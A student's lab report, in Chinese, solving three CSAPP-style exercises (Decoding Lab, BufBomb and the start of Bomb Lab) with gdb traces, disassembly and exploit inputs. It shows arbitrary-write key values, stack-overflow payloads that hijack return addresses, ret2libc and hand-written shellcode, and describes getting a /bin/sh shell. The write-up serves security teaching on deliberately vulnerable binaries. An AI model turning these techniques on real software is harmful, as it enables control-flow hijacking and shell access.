# C语言程序设计安全项目解题报告

## Tiger1218\*

## 四川大学网络空间安全学院

## 2022年12月31日

## 目录

1 Intros							
2	Lab	Lab1: Decoding Lab					
	2.1	Key1 & Key2	2				
	2.2	Key3 & Key4	4				
	2.3	Summary	7				
3	Lab	2: BufBomb	7				
	3.1	solution1	7				
	3.2	solution2	9				
	3.3	solution3	9				
	3.4	solution4/彩蛋	12				
	3.5	Summary	12				
4	Lab	3: Bomb Lab	13				
	4.1	Initialize	13				
		4.1.1 filestream	13				
		4.1.2 bind	14				
	4.2	Phase1	14				
	4.3	Phase2	14				
	4.4	Phase3	16				
	4.5	Phase4	17				
	4.6	Phase5	18				

<sup>\*</sup>email me at tiger<br/>1218@foxmail.com

5	Sun	nmary		22
		4.7.4	Section4	21
		4.7.3	Section3	20
		4.7.2	Section2	20
		4.7.1	Section1	19
	4.7	Phase6		19

### 1 Intros

此报告主要基于我发布在我博客上的三篇文章, Decoding Lab, bufbomb和Bomb Lab。在解题过程中需要用到的所有文件都已被存储在我的 Github 仓库中。每个 Lab 的每个 Section的编译选项都已注明。以下是硬件环境:

```
root@workshop:~# lscpu
                         x86_64
Architecture:
  CPU op-mode(s):
                         32-bit, 64-bit
                         46 bits physical, 48 bits virtual
  Address sizes:
  Byte Order:
                         Little Endian
CPU(s):
                         2
  On-line CPU(s) list:
Vendor ID:
                         GenuineIntel
 Model name:
                         Intel(R) Xeon(R) Platinum 8255C CPU @ 2.50GHz
    CPU family:
   Model:
                         85
    Thread(s) per core:
   Core(s) per socket:
    Socket(s):
    Stepping:
    BogoMIPS:
                         5000.00
root@workshop:~# free -m
               total
                            used
                                         free
                                                   shared buff/cache
                                                                        available
                1975
                                                        2
                             270
                                          160
                                                                 1544
                                                                              1540
Mem:
                               0
                                            0
root@workshop:~# uname -a
Linux workshop 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14
root@workshop:~# vim --version
VIM - Vi IMproved 8.2 (2019 Dec 12, compiled Sep 13 2022 09:35:02)
root@workshop:~# gcc --version
gcc (Ubuntu 11.3.0-lubuntu1~22.04) 11.3.0
```

### 2 Lab1: Decoding Lab

### 2.1 Key1 & Key2

根据 guide.html,我们首先只需要考虑 key1 和 key2;而我们应该要得到一串解密 后的字符串,以 From:开头。审计函数 extract\_message1,经过黑盒 & 白盒测试,我们可以发现该函数会从 start+1 处开始,每 stride 个字符,drop 一个字符。考虑到小端序,我们整个字符数组应该为:

### 这是我们的解题脚本:

```
ı data = [
    0x63636363, 0x63636363, 0x72464663, 0x6F6D6F72,
          0x466D203A, 0x65693A72, 0x43646E20, 0x6F54540A,
          0x5920453A, 0x54756F0A, 0x6F6F470A, 0x21643A6F,
          0x594E2020, 0x206F776F, 0x79727574, 0x4563200A,
          0x6F786F68, 0x6E696373, 0x6C206765, 0x796C656B,
          0x2C336573, 0x7420346E, 0x20216F74, 0x726F5966,
          0x7565636F, 0x20206120, 0x6C616763, 0x74206C6F,
          0x20206F74, 0x74786565, 0x65617276, 0x32727463,
          0x6E617920, 0x680A6474, 0x6F697661, 0x20646E69,
          0x21687467, 0x63002065, 0x6C6C7861, 0x78742078,
11
          0x6578206F, 0x72747878, 0x78636178, 0x00783174
13
  real_data = []
  for num in data:
      for _ in range(4):
          real_data.append(num % 0x100)
19
          num //= 0x100
2.1
print("real_data = ", [hex(i)[2:].ljust(2, " ") for i in real_data])
print(("real_string = '" + "".join([chr(i) for i in real_data]) + "'").replace("
    \n", r"\n"))
```

图 1: 转换为在小端序电脑下的内存模式

定位 F, r, o, m。最后得出 start=9 & stride=3。

start 为 dummy(在内存中)的第一个 byte, stride 为 dummy(在内存中)的第二个 byte。

然而 Linux 和 Windows 都是小端序,所以正确的解释是: start 是 dummy 的 Least Significant Byte, stride 则是次低位。

也就是 dummy 应该为 0x????0309。? 可以取任何值。

看到 process\_keys12,该函数可以视为一个任意内存写:将 key1 赋值为 &key1 相对于指定修改内存的偏移,key2 为指定修改的值。

一种可能的解法就是修改 dummy。我们可以用反汇编软件或 gdb 知道 &dummy 与 &key1的偏移。

```
pwndbg> set args 0 0x0102
pwndbg> b lab1.c:76
Breakpoint 1 at 0x1479: file lab1.c, line 77.
pwndbg> r
Starting program: /root/repos/SCUCCS/C-Programming/Security Labs/lab1/lab1 0 0x0102
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
```

```
Breakpoint 1, main (argc=3, argv=0x7fffffffe378) at lab1.c:77
warning: Source file is more recent than executable.
       process_keys12(&key1, &key2);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
                                                                  ----[ REGISTERS / show-flags
off / show-compact-regs off
*RAX 0x102
RBX 0x0
*RCX 0x7fffffffe65e - 0x2f3d4c4c45485300
RDX 0x0
*RDI 0x10
*RSI 0x102
*R8 0xffffffffffffff
R9
    0 \times 0
*R10 0x7ffff7f4aac0 (_nl_C_LC_CTYPE_toupper+512) \leftarrow 0x100000000
*R11 0x7ffff7f4b3c0 (_nl_C_LC_CTYPE_class+256) - 0x200020002
*R12 0x7fffffffe378 - • 0x7fffffffe61d - '/root/repos/SCUCCS/C-Programming/Security Labs/lab1
/lab1'
*R13 0x55555555553a2 (main) → endbr64
*R14 0x55555557da0 (__do_global_dtors_aux_fini_array_entry) → 0x5555555555180 (
__do_global_dtors_aux) → endbr64
*R15 0x7ffff7ffd040 (_rtld_global) → 0x7ffff7ffe2e0 → 0x55555554000 ← 0x10102464c457f
*RBP 0x7fffffffe260 ← 0x3
*RSP 0x7fffffffe210 - 0x7ffffffffe378 - 0x7fffffffe61d - '/root/repos/SCUCCS/C-Programming
/Security Labs/lab1/lab1'
*RIP 0x555555555479 (main+215) ← lea rdx, [rbp - 0x2c]
                                                                        -----[ DISASM / x86-64
 / set emulate on
7-
                             lea
► 0x5555555555479 <main+215>
                                     rdx, [rbp - 0x2c]
0x555555555547d <main+219>
                            lea
                                   rax, [rbp - 0x30]
0x5555555555481 <main+223>
                            mov
                                   rsi, rdx
0x555555555484 <main+226>
                            mov
                                   rdi, rax
0x5555555555487 <main+229>
                            call process_keys12
                                                                cess_keys12>
0x555555555548c <main+234>
                            lea
                                   rax, [rbp - 0x34]
0x5555555555490 <main+238>
                            movzx eax, byte ptr [rax]
0x5555555555493 <main+241>
                           movsx eax, al
0x5555555555496 <main+244>
                                   dword ptr [rbp - 0x20], eax
                            mov
                                   rax, [rbp - 0x34]
0x5555555555499 <main+247>
                            lea
0x55555555549d <main+251>
                            add
                                   rax, 1
SOURCE (CODE)
In file: /root/repos/SCUCCS/C-Programming/Security Labs/lab1/lab1.c
      key1 = strtol(argv[1], NULL, 0);
73
      key2 = strtol(argv[2], NULL, 0);
      if (argc > 3) key3 = strtol(argv[3], NULL, 0);
74
75
      if (argc > 4) key4 = strtol(argv[4], NULL, 0);
76
▶ 77
        process_keys12(&key1, &key2);
78
      start = (int)(*(((char *) &dummy)));
79
      stride = (int)(*(((char *) &dummy) + 1));
80
81
82
      if (key3 != 0 && key4 != 0) {
```

```
STACK
00:0000 rsp 0x7fffffffe210 → 0x7fffffffe378 → 0x7fffffffe61d → '/root/repos/SCUCCS/C-
Programming/Security Labs/lab1/lab1'
            0x7fffffffe218 - 0x300000000
01:0008
02:0010
            0x7fffffffe220 ∢— 0x0
03:0018
            0x7fffffffe228 → 0x100000000
04:0020
            0x7fffffffe230 ← 0x10200000000
05:0028
            0x7fffffffe238 ← 0x0
            2 skipped
BACKTRACE
       0x555555555479 main+215
f 1 0x7fffff7db5d90 __libc_start_call_main+128
   0x7fffff7db5e40 __libc_start_main+128
    0x5555555555105 _start+37
pwndbg> p &dummy
$1 = (int *) 0x7fffffffe22c
pwndbg> p &dummy-&key1
$2 = -1
```

所以第一阶段的 payload 为 ./lab1 -1 0x0309。

```
root@workshop:~/repos/SCUCCS/C-Programming/Security Labs/lab1# ./lab1 -1 0x0309
From: Friend
To: You
Good! Now try choosing keys3,4 to force a call to extract2 and
avoid the call to extract1
```

### 2.2 Key3 & Key4

观察得知:

- 1. 与 process\_keys12 一样, process\_keys34 也是一个任意内存写。
- 2. 除非修改了 data、start 或者 stride, extract\_message1 执行后一定会使得 msg1 不等于空。
- 3. start 和 stride 应该不变;不然 extract\_message2 的返回值, msg2 就会被修改
- 4. process\_keys34 会执行两次; process\_keys34 的修改又是偏移性质,所以两次对内存的修改结果可能不一样。

由此可以得出两个解题思路:

1. 在第一处 process\_keys34 时修改返回地址,在 ret 的时候跳转到语句 msg2 = extract\_message2(start, stride); 所在的地址。

2. 在第一处 process\_keys34 时将 data 的第 10 位修改为 0。这样我们就可以进入 if; 进入 if 后的第二处 process\_keys34 又可以通过 offset 式的修改方法把第 10 位置为不为 0 的数,因此可以输出 msg2。

在这里仅简述第一种做法的方法。

```
pwndbg> set args -1 0x0309 4 49
pwndbg> b lab1.c:30
Breakpoint 1 at 0x1247: file lab1.c, line 30.
Starting program: /root/repos/SCUCCS/C-Programming/Security Labs/lab1/lab1 -1 0x0309 4 49
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, process_keys34 (key3=0x7fffffffe228, key4=0x7fffffffe22c) at lab1.c:30
warning: Source file is more recent than executable.
       *(((int *)&key3) + *key3) += *key4;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
                                                                  —[ REGISTERS / show-flags
off / show-compact-regs off
*RAX 0x7fffffffe228 ← 0x3100000004
*RCX 0x7fffffffe65e - 0x2f3d4c4c45485300
*RDX 0x7fffffffe22c - 0x900000031 /* '1' */
*RDI 0x7fffffffe228 ← 0x3100000004
*RSI 0x7fffffffe22c - 0x900000031 /* '1' */
*R8 0x199999999999999
R9
    0 \times 0
*R10 0x7ffff7f4aac0 (_nl_C_LC_CTYPE_toupper+512) - 0x100000000
     0x7ffff7f4b3c0 (_nl_C_LC_CTYPE_class+256) - 0x2000200020002
*R12 0x7fffffffe368 - • 0x7fffffffe617 - '/root/repos/SCUCCS/C-Programming/Security Labs/lab1
/lab1'
*R13 0x55555555553a2 (main) → endbr64
*R14 0x55555557da0 (__do_global_dtors_aux_fini_array_entry) -- 0x55555555555180 (
__do_global_dtors_aux) → endbr64
*R15 0x7ffff7ffd040 (_rtld_global) → 0x7ffff7ffe2e0 → 0x555555554000 ← 0x10102464c457f
*RBP 0x7fffffffe1f0 → 0x7fffffffe250 ← 0x5
*RSP 0x7fffffffe1f0 → 0x7fffffffe250 ← 0x5
*RIP 0x5555555555247 (process_keys34+16) - mov rax, qword ptr [rbp - 8]
                                                                           -[ DISASM / x86-64
 / set emulate on
► 0x555555555247 <process_keys34+16>
                                             rax, qword ptr [rbp - 8]
0x555555555524b <process_keys34+20>
                                    mov
                                           eax, dword ptr [rax]
0x555555555524d <process_keys34+22>
                                    cdqe
0x555555555524f cess_keys34+24>
                                    lea
                                           rdx, [rax*4]
0x5555555555257 cess_keys34+32>
                                    lea
                                           rax, [rbp - 8]
0x555555555555 cess_keys34+36>
                                    add
                                           rax, rdx
0x555555555525e cess_keys34+39>
                                    mov
                                           ecx, dword ptr [rax]
0x555555555260 cess_keys34+41>
                                           rax, qword ptr [rbp - 0x10]
                                    mov
0x555555555564 cess_keys34+45>
                                    mov
                                           edx, dword ptr [rax]
0x555555555566 cess_keys34+47>
                                           rax, qword ptr [rbp - 8]
                                    mov
0x55555555526a cess_keys34+51>
                                           eax, dword ptr [rax]
                                                                                      -[
SOURCE (CODE)
In file: /root/repos/SCUCCS/C-Programming/Security Labs/lab1.c
```

```
25 void process_keys12 (int * key1, int * key2) {
      *((int *) (key1 + *key1)) = *key2;
27 }
28
29 void process_keys34 (int * key3, int * key4) {
        *(((int *)&key3) + *key3) += *key4;
31 }
32
33 char * extract_message1(int start, int stride) {
      int i, j, k;
      int done = 0;
35
STACK
00:0000 rbp rsp
                           0x7fffffffe1f0 → 0x7fffffffe250 ← 0x5
01:0008
                           0x7fffffffe1f8 → 0x5555555554cb (main+297) ← mov edx, dword ptr
 [rbp - 0x1c]
                           0x7fffffffe200 → 0x7fffffffe368 → 0x7fffffffe617 ← '/root/
02:0010
repos/SCUCCS/C-Programming/Security Labs/lab1/lab1'
                           0x7fffffffe208 → 0x500000000
04:0020
                           0x7fffffffe210 ∢— 0x0
                           05:0028
06:0030
                           0x7fffffffe220 ← 0x309ffffffff
07:0038 rax rdi rdx-4 rsi-4 0x7fffffffe228 - 0x3100000004
BACKTRACE
► f 0 0x5555555555247 process_keys34+16
f 1 0x5555555554cb main+297
f 2 0x7ffff7db5d90 __libc_start_call_main+128
f 3 0x7ffff7db5e40 __libc_start_main+128
f 4 0x55555555555 _start+37
pwndbg> p &key3-$rbp
First argument of '-' is a pointer and second argument is neither
an integer nor a pointer of the same type.
pwndbg> p 0x7ffffffffe1f8 - (long)&key3
$1 = 16
```

一个 int 是 4 个 bvtes,所以 kev3 应该为 4,才能修改栈上的返回值。

```
root@workshop:~/repos/SCUCCS/C-Programming/Security Labs/lab1# objdump -d lab1 -M intel| grep
process_keys34
000000000001237 <process_keys34>:
14c6: e8 6c fd ff ff call 1237 <process_keys34>
14f7: e8 3b fd ff ff call 1237 <process_keys34>
```

0x14f7 - 0x14c6 = 49

因此 key4 就是 49。

稍微解释一下为什么可以这么做:原返回值一定是第一个 call process\_keys 的下一位汇编的地址;要修改成的返回值也要是第二个 call process\_keys 的地址。这两条指令的长短相等,故返回值之差一定也为 49。

所以第二阶段的 payload 为 ./lab1 -1 0x0309 4 49。

root@workshop:~/repos/SCUCCS/C-Programming/Security Labs/lab1# ./lab1 -1 0x0309 4 49

From: CTE To: You

Excellent!You got everything!

### 2.3 Summary

首先,总地来说,这个 Decoding Lab 的水平明显不如 CSAPP Labs。第一个问题在于该题在不同平台甚至不同编译优化环境下的 payload 不一样,这就让调试非常头疼:如果目标解题者,这种调试是很难的——尤其是在初学者尚未用明白 gdb 的时候,静态分析源程序基本分析不出来;比如 dummy 和 key1 之间的差,如果看源代码很容易误以为偏移是'-3',但是编译器在优化的时候其实会把 dummy+ key1 与 start+ stride 错开,哪怕调到 -Og 都是一样。第二个问题在于第二问有一些脑洞的成分,在解决第一问后,很容易将思路放在修改特定的数据上面,但是仔细分析后才能发现,修改 dummy/ start/ stride 都不行,要修改 data 或者栈上存储的返回值。

其次,顺利 + 能够形成激励机制地完成这个 lab 所需要的技术栈太大了。我(相对算比较轻松地)完成这个 lab 用到的技术栈有:

- 熟悉汇编语言
- 熟悉指针、Linux 内存机制
- 丰富的 Linux 使用经验
- 丰富的 gdb 经验

对其中一项或者几项不熟悉都会使得完成该 Lab 变成痛苦的事情。

### 3 Lab2: BufBomb

这道题的最低利用条件应该是 No Canary+ No PIE。

### 3.1 solution1

• elf file: bufbomb

- compile command: gcc -m32 bufbomb.c -o bufbomb -g -no-pie -fno-stack-protector -O0
- guard: no PIE, no Canary

审计题目源码后最容易发现的解法应该是跳过赋值语句,直接到 printf 语句。

```
80492b5:
         e8 26 fe ff ff
                                call
                                       80490e0 <__x86.get_pc_thunk.bx>
         81 c3 46 2d 00 00
                                add
                                       ebx,0x2d46
80492ba:
80492c0: 83 ec 0c
                                sub
                                       esp,0xc
80492c3: 8d 83 08 e0 ff ff
                                lea
                                       eax,[ebx-0x1ff8]
80492c9: 50
                                push
80492ca: e8 81 fd ff ff
                                call
                                       8049050 <printf@plt>
80492cf:
         83 c4 10
                                add
                                       esp,0x10
80492d2: e8 b1 ff ff ff
                                call
                                       8049288 <getbuf>
80492d7: 89 45 f4
                                       DWORD PTR [ebp-0xc],eax
                                mov
80492da: 83 ec 08
                                sub
                                       esp,0x8
80492dd: ff 75 f4
                                       DWORD PTR [ebp-0xc]
                                push
80492e0: 8d 83 19 e0 ff ff
                                lea
                                       eax,[ebx-0x1fe7]
80492e6: 50
                                push
                                       eax
80492e7: e8 64 fd ff ff
                                       8049050 <printf@plt>
                                call
80492ec: 83 c4 10
                                add
                                       esp,0x10
80492ef: 90
                                nop
         8b 5d fc
                                       ebx, DWORD PTR [ebp-0x4]
80492f0:
                                mov
80492f3:
         c9
                                leave
80492f4: c3
                                ret
```

如以上代码所述,在 0x80492d2 处执行完 getbuf,接下来是把返回值(即 eax)压进栈中,然后再把字符串(即 getbuf returned %x

n)地址压入栈中。因为我们可以通过 getxs 操作整个 getbuf 函数的栈,又因为 test 函数调用了 getbuf 函数———也就是 test 在 getbuf 逻辑意义上的上面(或者物理意义的下面),我们也可以操纵整个 test 的栈。这样第一种利用 printf 语句的方法就很容易得出了: 跳到 0x80492e0,然后控制栈顶使栈顶为 0xdeadbeef。

```
08049288 <getbuf>:
8049288: 55
                                push
                                       ebp
8049289: 89 e5
                                mov
                                       ebp,esp
804928b: 83 ec 18
                                       esp,0x18
                                sub
804928e: e8 bb 00 00 00
                                call
                                       804934e <__x86.get_pc_thunk.ax>
8049293: 05 6d 2d 00 00
                                add
                                       eax,0x2d6d
8049298: 83 ec 0c
                                sub
                                       esp,0xc
         8d 45 e8
804929b:
                                lea
                                       eax,[ebp-0x18]
804929e: 50
                                       eax
                                push
804929f: e8 02 ff ff ff
                                call
                                       80491a6 <getxs>
80492a4: 83 c4 10
                                add
                                       esp,0x10
80492a7: b8 01 00 00 00
                                       eax,0x1
                                mov
80492ac:
                                leave
80492ad: c3
                                ret
```

显然栈抬升了 0x18 个 Bytes (注意栈从高向低生长)。因此我们的 Payload 需要加上 0x18 个 Bytes 的填充。

程序为 32 位程序; 那么 Payload 还需要加上 0x04 个 Bytes 来填充 edp。

最后我们需要将存储的 eip 指针覆盖为我们想要去的地址,也就是 0x80492e0,并且使得覆盖完后的栈顶<sup>1</sup>为 0xdeadbeef。(注意 Linux x64 是小端序机器)

<sup>&</sup>lt;sup>1</sup>基本的C 语言函数调用栈知识可以看这篇文章。

### 3.2 solution2

• elf file: bufbomb

- compile command: gcc -m32 bufbomb.c -o bufbomb -g -no-pie -fno-stack-protector -O0
- guard: no PIE, no Canary

另外一个非常容易想到的思路和  $ret2libc^2$ 非常像。

我们完全可以不使用 0x080492e7 处的 printf————我们可以自己构造一个出来! 字符串的地址是 0x0804A019,第二个参数应为 0xdeadbeef,所以根据 i386 架构下的 ret2libc 原理,我们可以写出以下 payload:

```
padding + ebp + (target address) + (return address) + arg1 + arg2 + arg3 ...
```

与 solution1 中一样, padding 为 0x18Bytes, ebp 为 0x04Bytes。目标函数为 printf 在 plt 表中的位置。return function 可以不填。arg1 为 0x0804A019,arg2 为 0xdeadbeef。

```
00:0000 eax esp 0xffffd3b0 ← 0x0

... ↓ 6 skipped

07:001c 0xffffd3cc → 0x8049050 (printf@plt) ← jmp dword ptr [0x804c010]

08:0020 0xffffd3d0 ← 0x0

09:0024 0xffffd3d4 → 0x804a019 ← 'getbuf returned 0x%x\n'

0a:0028 0xffffd3d8 ← 0xdeadbeef
```

#### 3.3 solution3

- elf file: bufbomb-no-nx
- compile command: gcc -m32 bufbomb.c -o bufbomb-no-nx -g -no-pie -fno-stack-protector -O0 -z execstack
- guard: no PIE, no Canary, no NX, no ASLR

接下来我们来讨论在关闭 NX 保护和关闭 ASLR 保护的利用情况。<sup>3</sup> 我们可以回顾一下程序的各个 section 基本情况:

```
0 /root/repos/SCUCCS/C-Programming/Security Labs/lab2/
0x8048000 0x8049000 r--p
                             1000
bufbomb-no-nx
0x8049000 0x804a000 r-xp
                              1000
                                     1000 /root/repos/SCUCCS/C-Programming/Security Labs/lab2/
bufbomb-no-nx
0x804a000 0x804b000 r--p
                                     2000 /root/repos/SCUCCS/C-Programming/Security Labs/lab2/
                              1000
bufbomb-no-nx
0x804b000 0x804c000 r--p
                              1000
                                     2000 /root/repos/SCUCCS/C-Programming/Security Labs/lab2/
bufbomb-no-nx
```

<sup>&</sup>lt;sup>2</sup>在 CTF-Wiki 上简述了ret2libc的原理和利用方法。

<sup>&</sup>lt;sup>3</sup>How to turn off gcc compiler optimization to enable buffer overflow? - stackoverflow

```
1000
0x804c000
           0x804d000 rw-p
                                     3000 /root/repos/SCUCCS/C-Programming/Security Labs/lab2/
bufbomb-no-nx
0x804d000 0x806f000 rw-p
                             22000
                                        0 [heap]
0xf7d81000 0xf7da1000 r--p
                              20000
                                         0 /usr/lib/i386-linux-gnu/libc.so.6
                             182000 20000 /usr/lib/i386-linux-gnu/libc.so.6
0xf7da1000 0xf7f23000 r-xp
                              85000 1a2000 /usr/lib/i386-linux-gnu/libc.so.6
0xf7f23000 0xf7fa8000 r--p
0xf7fa8000 0xf7fa9000 --
                               1000 227000 /usr/lib/i386-linux-gnu/libc.so.6
0xf7fa9000 0xf7fab000 r--p
                               2000 227000 /usr/lib/i386-linux-gnu/libc.so.6
                               1000 229000 /usr/lib/i386-linux-gnu/libc.so.6
0xf7fab000 0xf7fac000 rw-p
0xf7fac000 0xf7fb6000 rw-p
                               a000
                                         0 [anon_f7fac]
                                         0 [anon_f7fbe]
0xf7fbe000 0xf7fc0000 rw-p
                               2000
0xf7fc0000 0xf7fc4000 r--p
                               4000
                                         0 [vvar]
0xf7fc4000 0xf7fc6000 r-xp
                               2000
                                         0 [vdso]
0xf7fc6000 0xf7fc7000 r--p
                               1000
                                         0 /usr/lib/i386-linux-gnu/ld-linux.so.2
0xf7fc7000 0xf7fec000 r-xp
                                      1000 /usr/lib/i386-linux-gnu/ld-linux.so.2
                              25000
0xf7fec000 0xf7ffb000 r--p
                                     26000 /usr/lib/i386-linux-gnu/ld-linux.so.2
                               f000
                                     34000 /usr/lib/i386-linux-gnu/ld-linux.so.2
0xf7ffb000 0xf7ffd000 r--p
                               2000
                                     36000 /usr/lib/i386-linux-gnu/ld-linux.so.2
0xf7ffd000 0xf7ffe000 rw-p
                               1000
0xfffdd000 0xffffe000 rwxp
                              21000
                                         0 [stack]
```

- 1. .code 段有读、执行权限, 但是没有写权限
- 2. .data、heap、通常情况下的 stack 段,都是只有读写权限
- 3. .rodata 只有读权限
- 一般来说,写权限和执行权限应该尽量分开。这种保护方法就叫 NX 保护————或者 No eXecute 保护。

但是如果我们主动在 gcc 编译中关闭 NX 保护,那我们就可以得到一个 RWX 段,也就是同时有读、写、执行权限的段,栈。

这时我们可以考虑将 shellcode 写在栈上,然后劫持控制流到 shellcode 的开始处。这时 Payload 应具有下面的结构:

#### shellcode + padding + ebp + shellcode's start addr

第二个问题出现了。shellcode 写在栈上,虽然我们可以通过关闭 NX 保护将 shellcode 从不可执行变成可执行,但是我们并不知道 shellcode 的地址。每次我们运行程序的时候,内核都会随机加载程序的地址空间。

Problem solved! 那就让我们随便试两条汇编指令吧!

```
080492ae <test>:
80492ae: 55
                                push
                                       ebp
80492af: 89 e5
                                       ebp,esp
                                mov
80492b1: 53
                                push
                                       ebx
80492b2:
         83 ec 14
                                sub
                                       esp,0x14
80492b5:
         e8 26 fe ff ff
                                call
                                       80490e0 <__x86.get_pc_thunk.bx>
80492ba:
         81 c3 46 2d 00 00
                                add
                                       ebx,0x2d46
                                       esp,0xc
80492c0: 83 ec 0c
                                sub
80492c3: 8d 83 08 e0 ff ff
                                lea
                                       eax,[ebx-0x1ff8]
80492c9:
         50
                                push
                                       eax
         e8 81 fd ff ff
80492ca:
                                call
                                       8049050 <printf@plt>
80492cf:
         83 c4 10
                                add
                                       esp,0x10
                                       8049288 <getbuf>
80492d2: e8 b1 ff ff ff
                                call
                                       DWORD PTR [ebp-0xc],eax
80492d7: 89 45 f4
                                mov
```

```
sub
                                      esp,0x8
80492da: 83 ec 08
80492dd: ff 75 f4
                               push
                                      DWORD PTR [ebp-0xc]
                                      eax,[ebx-0x1fe7]
80492e0: 8d 83 19 e0 ff ff
                               lea
80492e6: 50
                               push
80492e7: e8 64 fd ff ff
                               call
                                      8049050 <printf@plt>
80492ec: 83 c4 10
                               add
                                      esp,0x10
80492ef: 90
                               nop
80492f0: 8b 5d fc
                               mov
                                      ebx, DWORD PTR [ebp-0x4]
80492f3: c9
                               leave
80492f4: c3
                               ret
```

```
mov eax, 0xdeadbeef
push 0x80492d7
ret; or you can simply jmp:)
;B8EFBEAD DE68D792 0408C300 00000000 00000000 EBP ADDR
```

```
0x80492a7 <getbuf+31>
                          mov
                                 eax, 1
 0x80492ac <getbuf+36>
                          leave
 0x80492ad <getbuf+37>
                          ret
 0xffffd380
                          mov
                                 eax, 0xdeadbeef
► 0xffffd385
                                 test+41
                                                             <0x80492d7>
                          push
 0xffffd38a
                          ret
 0x80492d7 <test+41>
                          mov
                                 dword ptr [ebp - 0xc], eax
 0x80492da <test+44>
                          sub
                                 esp, 8
 0x80492dd <test+47>
                          push
                                 dword ptr [ebp - 0xc]
 0x80492e0 <test+50>
                          lea
                                 eax, [ebx - 0x1fe7]
 0x80492e6 <test+56>
                          push eax
```

当跳转到 0x80492d7 后,这一切就像无事发生,只不过返回值,也就是 eax 会被改成 0xdeadbeef。

```
push 0xdeadbeef
push 0x80492e0
ret

;payload: 68EFBEAD DE68E092 0408C300 00000000 00000000 00000000 EBP ADDR
```

```
0x80492a7 <getbuf+31>
                           mov
                                  eax, 1
  0x80492ac <getbuf+36>
                           leave
  0x80492ad <getbuf+37>
                           ret
  0xffffd380
                                  0xdeadbeef
                           push
► 0xffffd385
                                  test+50
                                                                <0x80492e0>
                           push
  0xffffd38a
                           ret
  0x80492e0 <test+50>
                                  eax, [ebx - 0x1fe7]
                           lea
  0x80492e6 <test+56>
                           push
  0x80492e7 <test+57>
                           call
                                  printf@plt
                                                                 <printf@plt>
  0x80492ec <test+62>
                                  esp, 0x10
                           add
  0x80492ef <test+65>
                           nop
```

<sup>&</sup>lt;sup>4</sup>我们可以使用PWNTools 中的 ASM 模块来将汇编代码编译成字节码。

跳转到 0x80492e0 也就意味着跳过了 push 第二个参数。因此,我们可以直接通过栈操作到给第二个参数赋值。

当然,既然我们可以执行任意汇编代码了,那我们有很多种方法来使得输出达到我们想要的结果。

### 3.4 solution4/彩蛋

- elf file: bufbomb-no-nx
- compile command: gcc -m32 bufbomb.c -o bufbomb-no-nx -g -no-pie -fno-stack-protector -O0 -z execstack
- guard: no PIE, no Canary, no NX, no ASLR

既然我们可以执行任意汇编代码,那我们为什么不试着拿 Shell 权限呢?首先我们需要找到一个放置 Shellcode 的地方。

回到我们前面给到的这个结构: shellcode + padding + ebp + shellcode's start addr padding + ebp 一共是 24Bytes, 但是考虑到 Shellcode 执行阶段可能遇到的 push 指令,更好的选择其实是放在 shellcode's start addr 的后面。

这时我们的 payload 就变成了下面的结构:

padding + ebp + shellcode's start addr + shellcode

在网上找一个小一点的 Shellcode<sup>5</sup>, 我们就得到了我们最终的 Payload:

图 2: 彩蛋: 拿到 shell 后直接输出 'getbuf returned Oxdeadbeef'

# echo getbuf returned 0xdeadbeef getbuf returned 0xdeadbeef

<sup>&</sup>lt;sup>5</sup>利用 int 0x80 执行了/bin/sh 的一段Shellcode

### 3.5 Summary

首先声明一点,这个 Assignment 在 CSAPP 第三版中已经没有了。所以 bufbomb.c 上面的参考价值不大。尤其是不要按照它上面的编译指令去编译: -Og 和 -O2 会把程序结构搅乱到根本做不了,没有-fno-stack-protector 和-no-pie 就是字面意思上的做不了这道题。

然后谈谈我个人对这个 Lab(Assignment) 的理解: 我并不觉得这个 Lab(Assignment) 很好。第一点就是 CSAPP 2nd 到 CSAPP 3rd 编辑的主旋律就是 x86tox86-64,整个 Lab(Assignment) 在设计的时候带着 IA32 的思维,不难理解为什么放在现在颇有鸡肋之感。第二点是没有难度梯度,思维难度大且调试难度高的题目如果没有 checkpoint 很容易让人放弃。第三点就是与Buffer Lab 冲突,而且 Buffer Lab 是它的上位替补,这个应该做过 Buffer Lab 的人都深有体会———深入浅出,让人醍醐灌顶。

### 4 Lab3: Bomb Lab

Above all, I need to declare that I used the newest version of Bomb Lab, which means it differs in many ways from the 200X version of this lab. The most notable difference is that is uses x64 architecture.

```
curl http://csapp.cs.cmu.edu/3e/bomb.tar --output bomb.tar
tar xvf bomb.tar
```

#### 4.1 Initialize

#### 4.1.1 filestream

```
if ( argc == 1 )
      {
          infile = (FILE *)stdin;
      }
      else
      {
          v3 = argv;
          if ( argc != 2 )
          {
               __printf_chk(1LL, "Usage: %s [<input_file>]\n", *argv);
10
               exit(8);
11
          }
          *(_QWORD *)&argc = argv[1];
13
          argv = (const char **)"r";
          infile = fopen(*(const char **)&argc, "r");
          if (!infile)
          {
17
               __printf_chk(1LL, "%s: Error: Couldn't open %s\n", *v3, v3[1]);
18
              exit(8);
19
```

21 }

如果运行程序的时候有参数,那么将参数视为文件地址,然后把输入流重定向至文件读入流。

这意味着我们可以使用 ./bomb payload 来检验我们的 payload 了。(虽然原来也可以 ./bomb < payload 就是了)

#### 4.1.2 bind

initialize\_bomb 函数把 SIGINT 信号(一般来自于 Ctrl+C) 绑定到了 signal\_handler 函数上面。 $^6$ 

### 4.2 Phase1

```
__int64 __fastcall phase_1(__int64 a1)
{
    __int64 result; // rax

result = strings_not_equal(a1, "Border relations with Canada have never been better.");
if ( (_DWORD)result )
    explode_bomb();
return result;
}
```

Listing 1: Discompile by IDA Pro

因为源文件并没有去除符号表,因此我们可以猜测 string\_not\_equal 函数在 arg1 和 arg2 相等时返回 1。

所以 Phase1 的 Payload 就是 Border relations with Canada have never been better。

### 4.3 Phase2

```
__int64 __fastcall read_six_numbers(__int64 a1, __int64 a2)
{
        __int64 result; // rax
        result = __isoc99_sscanf(a1, &unk_4025C3, a2, a2 + 4, a2 + 8, a2 + 12,
        a2 + 16, a2 + 20);
        if ( (int)result <= 5 )
            explode_bomb();
        return result;
}
__int64 __fastcall phase_2(__int64 a1)
{</pre>
```

<sup>&</sup>lt;sup>6</sup>Linux SIGINT Manual Page

```
__int64 result; // rax
          char *v2; // rbx
12
